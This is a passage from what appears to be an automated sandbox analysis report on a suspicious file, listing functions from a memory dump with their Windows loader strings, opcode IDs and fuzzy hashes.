                                                                                                              Function 01BFC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • @, xrefs: 01BFC1F1
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01BFC1C5
                                                                                                              • PreferredUILanguages, xrefs: 01BFC212
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: 874b77ca6dfb3716ec6f55190e4a44c895ef47d2b777465d0b1e9f68ab8cc74f
                                                                                                              • Instruction ID: 3e321d8329d189a4348d7b81be22f0fd54f8ff05759c1e3bcbdf24c43cc8f9d7
                                                                                                              • Opcode Fuzzy Hash: 874b77ca6dfb3716ec6f55190e4a44c895ef47d2b777465d0b1e9f68ab8cc74f
                                                                                                              • Instruction Fuzzy Hash: 92413075A0021DABDF19DBD8C851FEEBBB8EB54700F1441AEEA09A7250D7749A88CB50
                                                                                                              Function 01BD4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: d0ac6188a981bf0a0508bb0c0f3c504e4e25f3bc51daacce1cb248d9afa612ec
                                                                                                              • Instruction ID: 4543ee9225abfac4346e61dd9082bbe68ac019b391ed8633f9beac02d9e94dcb
                                                                                                              • Opcode Fuzzy Hash: d0ac6188a981bf0a0508bb0c0f3c504e4e25f3bc51daacce1cb248d9afa612ec
                                                                                                              • Instruction Fuzzy Hash: C9410631A106598BEB2DDBE9C840BADBBF8FF55740F1405E9D901EBB91E7348901CB50
                                                                                                              Function 01BC4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrpCheckRedirection, xrefs: 01BC488F
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01BC4888
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01BC4899
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: 0bfa38760ecc781ceb6974801a733b0487d6371b7cee3cb89010fd5cceaec60d
                                                                                                              • Instruction ID: 7fd51a07fcce74bda015ce9259ffde40b172e66357399967da541db50a690ef0
                                                                                                              • Opcode Fuzzy Hash: 0bfa38760ecc781ceb6974801a733b0487d6371b7cee3cb89010fd5cceaec60d
                                                                                                              • Instruction Fuzzy Hash: 0341B232A056519FCB29CF5CD960A277BE4EF89E50B0606DEED49D7315D730DA00CB91
                                                                                                              Function 01B50BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              • Opcode ID: ca58099d6fbb93331e138ccbc4fbe62e69dac8dbdc149f478100ea5788a94256
                                                                                                              • Instruction ID: d8c1a2f36ce9bdb1e3e15fbca33a9a6b0563e7bbdf360902f066350c23818114
                                                                                                              • Opcode Fuzzy Hash: ca58099d6fbb93331e138ccbc4fbe62e69dac8dbdc149f478100ea5788a94256
                                                                                                              • Instruction Fuzzy Hash: 2111E1313181429FDB6DEB18C481B7AB3A4EF80B15F5982D9F806CB259DB30E840C751
                                                                                                              Function 01BC20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01BC2104
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 01BC20F3
                                                                                                              • LdrpInitializationFailure, xrefs: 01BC20FA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: 14800446a3787b28eabfce97202d31057b4528b1276122b9ca334666cfe41d86
                                                                                                              • Instruction ID: 46f17d99caefe877aea9e10b272aa4dff51b7e42cdab147eeaabb939720bf238
                                                                                                              • Opcode Fuzzy Hash: 14800446a3787b28eabfce97202d31057b4528b1276122b9ca334666cfe41d86
                                                                                                              • Instruction Fuzzy Hash: 9CF0FF35640248ABEA28EA4DCC42FA93B68EB81F44F1100E8F604AB281D3E0E900CA81
                                                                                                              Function 01B503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: fd760aaf407dc801c460e872c33a491782b272bf77c86f9207f7369fc6c72d9e
                                                                                                              • Instruction ID: 1c47502e4b69cf4158140d320d9cb508392754eda22edc9f8cea1c35e59ae3b3
                                                                                                              • Opcode Fuzzy Hash: fd760aaf407dc801c460e872c33a491782b272bf77c86f9207f7369fc6c72d9e
                                                                                                              • Instruction Fuzzy Hash: 69714C71A0014A9FDF09EF98C990BAEBBF8FF18744F1440A5E905A7251EB74ED01CBA0
                                                                                                              Function 01B4A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Exit, xrefs: 01B4AA25
                                                                                                              • LdrResSearchResource Enter, xrefs: 01B4AA13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              • Opcode ID: 80e556c10328eba3393fa4e6c7aec55f2cc93994a844d83f98e552e467795d50
                                                                                                              • Instruction ID: 5552efe21b014691e67d8cff79d219e9696f31f1f99007a096e9d92bb8dc0678
                                                                                                              • Opcode Fuzzy Hash: 80e556c10328eba3393fa4e6c7aec55f2cc93994a844d83f98e552e467795d50
                                                                                                              • Instruction Fuzzy Hash: 18E18571E44219AFEF29DFA9C980BAEBBB9FF08310F1485A5E902E7251D734D940DB50
                                                                                                              Function 01C0A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: 3a811eedb11affd94b6fe51c5e26008a697fe763e1a88247feec015dd24ce968
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: EFC1AD31204342DBEB26CF29C841B6BBBE5AFC4718F088A2DF6968B2D1D775D645CB41
                                                                                                              Function 01BBE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: 5950c1243ffae920a48950956a18acfbbfa502e4a0d6b4fd68ddb3d9c44cc81f
                                                                                                              • Instruction ID: f162fb63ddb1c1678b868f8bff3fb8250ee7c1754ed4aa7e042231e0ffebffd0
                                                                                                              • Opcode Fuzzy Hash: 5950c1243ffae920a48950956a18acfbbfa502e4a0d6b4fd68ddb3d9c44cc81f
                                                                                                              • Instruction Fuzzy Hash: 64613971A006199FDB18DFA9C880AFDBBB5FB48700F1481ADE659EB661D771E900CB50
                                                                                                              Function 01BE43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              • Opcode ID: 8cfa4fc20190ce28b3331a0dc84c0f062fb60d81702f118524dcce7e5ebfc649
                                                                                                              • Instruction ID: 33c1c88adc472d81ee80c45f4a3115e352999bc2fc7759af97af7a8761579cbb
                                                                                                              • Opcode Fuzzy Hash: 8cfa4fc20190ce28b3331a0dc84c0f062fb60d81702f118524dcce7e5ebfc649
                                                                                                              • Instruction Fuzzy Hash: 6151F771E1021EAFDF15DFA9CC84AEEBBF9EB44754F1005A9E611E7290D7309A05CB60
                                                                                                              Function 01B404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01B4063D
                                                                                                              • kLsE, xrefs: 01B40540
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              • Opcode ID: d377997ea3fc9d70b1a45adac24834c7c4e18aaabb8c0ae4db5c87664aee2dbd
                                                                                                              • Instruction ID: 46461aa3f51a362666d845d96946b7184f28f85beadba339c0321696a5eacff8
                                                                                                              • Opcode Fuzzy Hash: d377997ea3fc9d70b1a45adac24834c7c4e18aaabb8c0ae4db5c87664aee2dbd
                                                                                                              • Instruction Fuzzy Hash: 8A519C715047429BDB28EF68C5806E7BBE8EF84304F10887EFAAA87241E774D545DB92
                                                                                                              Function 01B4A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 01B4A309
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 01B4A2FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: e3021532c1d3fd557f59cae42b9dd5a0c9e05684a101684450a9b784a35884f5
                                                                                                              • Instruction ID: dbd15e240f1fa3fd0d81fb07dbd223c309a36cb6775da05ee4106811d8a6b8d3
                                                                                                              • Opcode Fuzzy Hash: e3021532c1d3fd557f59cae42b9dd5a0c9e05684a101684450a9b784a35884f5
                                                                                                              • Instruction Fuzzy Hash: 14419E31A44645DBEB29CF69C880B6EBBB4FF85700F5481E9E902DB2A1E3B5D940DB50
                                                                                                              Function 01B7A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              • Opcode ID: fa55a3773ebf4d58b98fff77510a4571a8c0b7d300bfec9529c5f7b1840c9d98
                                                                                                              • Instruction ID: 7462c33c5295d2d90d0f796897d37b89609dca03bfce341bdbfeb07d1e352c8f
                                                                                                              • Opcode Fuzzy Hash: fa55a3773ebf4d58b98fff77510a4571a8c0b7d300bfec9529c5f7b1840c9d98
                                                                                                              • Instruction Fuzzy Hash: 000128B2240704AFD365DF24CD45F1A77F8E795B15F0589B9B658C7190E334D904CB46
                                                                                                              Function 01B4C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: 783bbc9d6f84dca4cbb3aec918dc1ea148072f3a17e82946d9daa20ba74019b9
                                                                                                              • Instruction ID: f637c0773a94d440ea39dcda467b85a0f40a6666403ec7e161cc6f3f387aed60
                                                                                                              • Opcode Fuzzy Hash: 783bbc9d6f84dca4cbb3aec918dc1ea148072f3a17e82946d9daa20ba74019b9
                                                                                                              • Instruction Fuzzy Hash: 2D826B75E012198BEF29CFA9C880BEDBBB1FF48710F14C1AAD959AB351D7309941EB50
                                                                                                              Function 01BC6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: a4822560078aae19396772cc6afa6ccd7afa1828d8ebde81cd81edd8f8cb13c6
                                                                                                              • Instruction ID: e53a5306a722f7e624440aa3689f18738a7990902f026de4dca582290f7fa8a0
                                                                                                              • Opcode Fuzzy Hash: a4822560078aae19396772cc6afa6ccd7afa1828d8ebde81cd81edd8f8cb13c6
                                                                                                              • Instruction Fuzzy Hash: 2E914272940219AFEF25DF95CD85FAE7BB8EF14B50F1040A9F601AB291D774AD00CB50
                                                                                                              Function 01BEE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 20ecc07d27ee9848902adfd2b3f6a2e8c40785a11e588cc7a45167b33bc2c15e
                                                                                                              • Instruction ID: 8c239911cd266e1dd5f96fca8466181750b93962a9c24e51996c5119bc5b7513
                                                                                                              • Opcode Fuzzy Hash: 20ecc07d27ee9848902adfd2b3f6a2e8c40785a11e588cc7a45167b33bc2c15e
                                                                                                              • Instruction Fuzzy Hash: 03919F3190064AAFDF2AAFA5DC88FAFBBB9EF45740F1400A9F505A7250EB74D901CB51
                                                                                                              Function 01B7A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: 061b868480bcad4301b33434a4fa66aea2b72fae7290d54a1f8ecc59df7171b2
                                                                                                              • Instruction ID: d121af2b22ff3d6769115ebf7d1a7b94c4fd1148bba8bbcedd522bd542f92f6d
                                                                                                              • Opcode Fuzzy Hash: 061b868480bcad4301b33434a4fa66aea2b72fae7290d54a1f8ecc59df7171b2
                                                                                                              • Instruction Fuzzy Hash: CE715CB5E0021A9BDF2CCF99C990AEDBBB1FF58700F1481AAE905A7641E7B19D41CB50
                                                                                                              Function 01BE4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: beba26871695c6e87384cdeeb6a9ed709dbb6b86067968d70c087419661bc7d6
                                                                                                              • Instruction ID: 06b12b5771a8a05c762240c1ed07fc7d29e528338604785b7e64c3835cfd79b8
                                                                                                              • Opcode Fuzzy Hash: beba26871695c6e87384cdeeb6a9ed709dbb6b86067968d70c087419661bc7d6
                                                                                                              • Instruction Fuzzy Hash: 3A5172B2D012299BDF18DFA9D844AAEBBF5EF15710F0541ADEA11FB350D7349801CBA4
                                                                                                              Function 01B5E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: ef3bdb173028c830cce401c15c64c168204cdf4c93702acb3e8f9e8e60c45d91
                                                                                                              • Instruction ID: ca13e851fa7512b25834537e92530553f37dba72f82a08fe68bbe2ef24b40c83
                                                                                                              • Opcode Fuzzy Hash: ef3bdb173028c830cce401c15c64c168204cdf4c93702acb3e8f9e8e60c45d91
                                                                                                              • Instruction Fuzzy Hash: 434182725083029BDB69DB75D840B6BF7D8EF88714F440AADFA84D7140E774DA04C796
                                                                                                              Function 01BBC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: 63a6132414a82cc18dac7c203fb2ed61b018171386bcbec0275fb345f0400fa1
                                                                                                              • Instruction ID: 4cfcf7eacd71ca643519f75bf39b6741d7c8dfa038aa2d346cd483be6230a398
                                                                                                              • Opcode Fuzzy Hash: 63a6132414a82cc18dac7c203fb2ed61b018171386bcbec0275fb345f0400fa1
                                                                                                              • Instruction Fuzzy Hash: 324143B1D0012DABDF25DA60DC84FEEBB7CAB54714F0045E5EA08AB140DB709E89CFA4
                                                                                                              Function 01BD6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: 425b0b5b5f13a8cb997fc68118c1db3dc0f0376359eb36cf5faf5ebe97a00a1c
                                                                                                              • Instruction ID: cf2610a7d2c248d0e24cabac1eba38fdf6c2701b2134a89caa566489675db59f
                                                                                                              • Opcode Fuzzy Hash: 425b0b5b5f13a8cb997fc68118c1db3dc0f0376359eb36cf5faf5ebe97a00a1c
                                                                                                              • Instruction Fuzzy Hash: C7310831A007599BEB2EDF69C850BEE7BA8DF04704F1840A8E941AB282E775E805CB50
                                                                                                              Function 01BBCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: ecae0b1f62cb0562ba91cf23200d28d485d991ba9c1a89518eadfb5677748290
                                                                                                              • Instruction ID: 65e9dd5f80708432aa74f17f5af3aa27947f63453d56cea4c86cef75fbcedae2
                                                                                                              • Opcode Fuzzy Hash: ecae0b1f62cb0562ba91cf23200d28d485d991ba9c1a89518eadfb5677748290
                                                                                                              • Instruction Fuzzy Hash: 7A31F436900519AFEF2DDB58C895EBFBFB4EB80710F0141A9A905E7650D7709E04DBE0
                                                                                                              Function 01BC892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01BC895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 92231e35df14fc318275c1ae248eaac8fc2fd0771e426c9066eb8abb289efdf7
                                                                                                              • Instruction ID: 098fab7dce2dfc4a0b839267b3a73458d4576621828f0e28dd7e3d5a5d3f3680
                                                                                                              • Opcode Fuzzy Hash: 92231e35df14fc318275c1ae248eaac8fc2fd0771e426c9066eb8abb289efdf7
                                                                                                              • Instruction Fuzzy Hash: E3012B713002019FEA3C6B59DC84BD67B65EFD1B54B0421ACF64216561CBA1E840C7A6
                                                                                                              Function 01BE2000 Relevance: .8, Instructions: 757COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 711d9fbb583ff9cd2e61c6a2748e44be1a2d0aa5ab8e269ff87c1823a734793c
                                                                                                              • Instruction ID: a519981003544c0c10458967430fcd0da4d4064606937e5d3678e299074f7d58
                                                                                                              • Opcode Fuzzy Hash: 711d9fbb583ff9cd2e61c6a2748e44be1a2d0aa5ab8e269ff87c1823a734793c
                                                                                                              • Instruction Fuzzy Hash: 1742B4716083418BEB2DCF69C894A6BBBE9FF84700F0809EDFA8297250D775D945CB52
                                                                                                              Function 01BD8158 Relevance: .6, Instructions: 617COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cd3b179b32de3eb29605ec76129184f104b723e23f1b9e8140514a5f7a5984c
                                                                                                              • Instruction ID: 8f241c923b024749e3c92b278b649cb18f382df4cd627f0c2e7d9360d6d18c2b
                                                                                                              • Opcode Fuzzy Hash: 0cd3b179b32de3eb29605ec76129184f104b723e23f1b9e8140514a5f7a5984c
                                                                                                              • Instruction Fuzzy Hash: 31425C75A002198FEB29CF69C881BADBBF5FF48311F1581D9E949EB241EB349981CF50
                                                                                                              Function 01B52840 Relevance: .6, Instructions: 605COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
